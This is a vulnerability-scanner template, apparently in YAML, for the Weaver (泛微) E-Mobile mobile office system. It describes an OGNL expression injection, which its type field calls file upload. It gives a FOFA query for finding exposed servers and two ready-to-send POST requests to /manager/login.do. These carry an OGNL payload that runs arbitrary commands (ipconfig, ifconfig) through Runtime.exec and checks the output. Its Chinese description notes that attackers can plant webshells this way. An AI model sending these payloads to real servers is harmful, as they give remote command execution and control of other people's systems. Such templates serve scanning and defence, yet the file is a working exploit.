product: 泛微 E-Mobile
vName: 泛微E-Mobile Ognl表达式注入
type: 文件上传
vID: [ ]
level: 3
vDesc: e-mobile可满足企业日常管理中的绝大部分管理需求，诸如市场销售、项目、采购、研发、客服、财务、人事、行政等；同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口，包括企业员工、供应商、代理商、合作伙伴、投资费以及终端客户等整个供应链条上的关系主体，满足为企业全方位的移动办公需求。该系统存任意文件上传漏洞，攻击者可通过此漏洞上传webshell木马远程控制服务器。
version: ''
note: ''
search:
  FOFA: app="泛微-EMobile"
protocol: http
link: https://cn-sec.com/archives/886881.html
fix: [ ]
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /manager/login.do
      data: message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=ipconfig
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - Windows IP
            logic: and
  - exp:
      method: post
      follow: false
      path: /manager/login.do
      data: message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=ifconfig
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - inet
              - netmask
              - packets
            logic: and